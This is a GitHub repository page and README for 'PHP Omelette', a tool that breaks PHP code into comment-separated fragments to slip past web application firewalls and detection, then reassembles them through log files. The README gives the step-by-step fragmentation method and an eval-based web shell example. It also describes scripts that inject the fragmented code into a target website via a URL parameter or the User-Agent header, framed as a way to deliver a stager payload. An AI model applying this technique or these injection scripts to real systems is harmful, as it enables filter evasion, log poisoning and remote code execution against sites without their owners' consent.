https://github.com/wireghoul/php-omelette
Code fragmentation technique for scripting languages
https://github.com/wireghoul/php-omelette
Last synced: 21 days ago
JSON representation
Code fragmentation technique for scripting languages
- Host: GitHub
- URL: https://github.com/wireghoul/php-omelette
- Owner: wireghoul
- Created: 2021-01-11T10:29:18.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2021-01-11T10:38:17.000Z (over 4 years ago)
- Last Synced: 2025-03-23T21:35:46.473Z (about 1 month ago)
- Language: PHP
- Size: 7.81 KB
- Stars: 17
- Watchers: 3
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
PHP OMELETTE
===============================================================================
A code fragmentation technique for avoiding filtering or detection from things
like web application firewalls. Inspired by the concept of fragmented shellcode
used in memory corruption [omelet][1] and can scatter fragmented PHP code
through log files yet still execute it as a single bit of PHP.
The broad concept is:
1. Everything inside the `` tags is code
2. Everything inside the `/*` `*/` multi line comments are ignored
3. PHP parsing has some flexibility
The preferred use of this is to inject a small stager payload, but bigger files
could be transformed as well.
The steps are simple enough that they can be performed manually:
1. Add comment after all opening tags
2. Add comment before all closing tags
3. Add comments before and after semi colons
4. Add comment after comma
5. Add comments before and after opening and closing pharanteses
6. Remove duplicate comments
7. Insert new line before each closing multi line comment
8. Remove empty lines
More steps can be added, or you can implement your own version, but keeping
them simple means you can use the steps on other languages like JavaScript as
well.
This repository includes some scripts to help automate the process of
fragmenting and injecting the code, and some "debugging" tools. The automated
process is not syntax aware so beware when using strings or embedding PHP in
things like HTML.
omelette
-------------------------------------------------------------------------------
The main script for fragmenting PHP code, uses regex to generate fragmented PHP
code. Code is given as the first agrument. Examples:
```bash
$ ./omelette '=eval($_GET[0])?>'
$ ./omelette "$(cat t/shell3.php)" > plate
```
injectlog.sh and injectUA.sh
-------------------------------------------------------------------------------
Automatically fragment and inject the omelette to a website. Takes PHP code as
first argument and a URL as the second. Will send injection as parameter or via
UserAgent. Examples:
```bash
$ ./injectlog.sh '' 'http://example.com?id=1&inject='
$ ./injectUA.sh "$(cat t/shell1.php)" http://example.com
```
view-clean.sh
-------------------------------------------------------------------------------
Tries to show the fragmented code in a cleaner/readable format. Example:
```
./view-clean.sh ./plate
```
php_parse.php
-------------------------------------------------------------------------------
Breaks PHP code into parsed tokens, handy when seeing how the PHP parser deals
with fragmented code:
```
php php_parse.php ./file
```
Credits
===============================================================================
Wireghoul - http://www.justanotherhacker.com
References:
[1]: "Eggs to omelet"